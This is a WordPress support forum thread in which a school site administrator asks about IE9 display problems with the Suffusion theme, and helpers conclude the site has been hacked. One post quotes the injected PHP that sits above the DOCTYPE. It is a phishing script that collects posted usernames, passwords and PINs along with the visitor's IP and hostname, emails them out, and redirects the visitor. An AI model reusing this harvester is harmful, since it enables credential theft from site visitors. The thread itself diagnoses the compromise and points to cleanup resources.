4.4.4 & IE 9

Probably the DOCTYPE error here:

https://validator.w3.org/check?uri=http%3A%2F%2Fwebsites.msdpt.k12.in.us%2Fhe%2F&charset=%28detect+automatically%29&doctype=Inline&group=0

You should not have any code above the DOCTYPE – IE freaks out!

Looks like a great tool to check, but I am not seeing what file it is referencing to go hacking. Where is DOCTYPE?

Additionally, trying to solve this I ended up with 3 versions of 4.4.4. suffusion4.4.4, suffusion4-4-4 and suffusion444.
All three show up in theme list, but no way to differentiate.
I also have two 3.4.7’s in there and one that claims to be 3.7.8 but comes up as 3.4.7. How do I find what folder each is TRULY pointing to so I can remove some? They are all telling me I can’t move or delete because they are in use. (I know, different subject, but part of the problem.)

The DOCTYPE goes at the top of every page — see this:

https://www.w3schools.com/tags/tag_doctype.asp

All of your sites have code above it – did you add it to the header.php files?

<?

$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message .= "---------------Great1------------------------------------\n";
$message .= "User ID: ".$_POST['username']."\n";
$message .= "Password: ".$_POST['realm']."\n";
$message .= "Personal Identification Number: ".$_POST['password']."\n";
$message .= "-------------------------------------------------------------------\n";
$message .= "Client IP : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$rnessage = "$message\n";
$message .= "---------------O My LORD------------------------------------\n";
$recipient = "[email protected], [email protected]";
$subject = "BofA";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$rnessage,$headers);
mail($messege,$subject,$rnessage,$headers);
		   header("Location: https://www.pacific.net.au/account/loginCustomer.jsp");
?><!DOCTYPE html>

I have not done ANY customizing outside of choices within the theme. However, I see in the header.php there IS a php block of code above DOCTYPE. Guessing it would be in lots of places/files/code segments.

From HEADER.PHP

<?php
/**
 * Core header file, invoked by the get_header() function
 *
 * @package Suffusion
 * @subpackage Templates
 */
global $suffusion_unified_options, $suffusion_interactive_text_fields, $suffusion_translatable_fields, $suffusion_skin_dependence, $suf_color_scheme;

if (function_exists('icl_t')) {
	foreach ($suffusion_unified_options as $id => $value) {
		/**
		 * Some strings are set interactively in the admin screens of Suffusion. If you have WPML installed, then there may be translations of such strings.
		 * This code ensures that such translations are picked up, then the unified options array is rewritten so that subsequent calls can pick it up.
		 */
		if (function_exists('icl_t') && in_array($id, $suffusion_translatable_fields) && isset($suffusion_interactive_text_fields[$id])) {
			$value = wpml_t('suffusion-interactive', $suffusion_interactive_text_fields[$id]."|".$id, $value);
		}
		global $$id;
		$$id = $value;
		$suffusion_unified_options[$id] = $value;
	}
}
?>
<!DOCTYPE html>
<!--[if IE 6]> <html id="ie6" <?php language_attributes(); ?>> <![endif]-->
<!--[if IE 7]> <html id="ie7" <?php language_attributes(); ?>> <![endif]-->
<!--[if IE 8]> <html id="ie8" <?php language_attributes(); ?>> <![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8)]><!--> <html <?php language_attributes(); ?>> <!--<![endif]-->

<head>

[Please wrap your code in backticks, in future]

Validator you used doesn’t understand PHP?

I see there is no [if for IE 9..
Works fine in IE 10.
If only we didn’t have 7000 PCs defaulted to IE 9…

That’s really odd and shouldn’t be there in the generated HTML. I’ve installed that 4.4.4 theme on my test installation and I am not seeing that code at the top like that.

Backing down to 3.7.8 “fixes” the issue, but…

Can you take one of those sites and switch to the Twenty Eleven theme? That’s just to confirm if it’s your theme or something else generating that code.

That code that is showing up has me really worried and that really does look like you’ve been hacked. ??

This is now at Twenty Twelve
https://websites.msdpt.k12.in.us/he/

Even THAT looks bad in IE9.

Yep, “Basically” isn’t too bad, but… They ALL look fine in FF & Chrome.
Cannot figure out what happened. They were fine yesterday!

Sorry I had to leave for a while, but I had the same concern as Jan – that your sites have been hacked. Can you go back to twentytwelve and deactivate all your plug-ins just to see if that changes it (the errant code)? (It’s not that the sites are “okay” in FF and Chrome, just that IE is a fussy browser – the bad code is there in all of them.)

I have to agree with WPyogi: your site really is hacked.

That code is being inserted incorrectly but it’s PHP for mailing user id and passwords. You really have to find what’s causing that because that’s the code that’e being improperly inserted into your web page.

Where is it being successfully inserted into your PHP? Meaning what can’t we see?

You need to start working your way through these resources:
https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://www.ads-software.com/support/topic/268083#post-1065779
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
https://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:
https://sitecheck.sucuri.net/scanner/
https://www.unmaskparasites.com/
https://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
https://codex.www.ads-software.com/Hardening_WordPress
https://www.studiopress.com/tips/wordpress-site-security.htm

I will, but to be clear, you are saying this is not normal? (below)
<?php
/**
* The Header for our theme.
*
* Displays all of the <head> section and everything up till <div id=”main”>
*
* @package WordPress
* @subpackage Twenty_Eleven
* @since Twenty Eleven 1.0
*/
?><!DOCTYPE html>

That’s normal, but that’s not what is on your site. Look at the code (rendered HTML) I posted above — it’s bad and it’s in every page of your sites.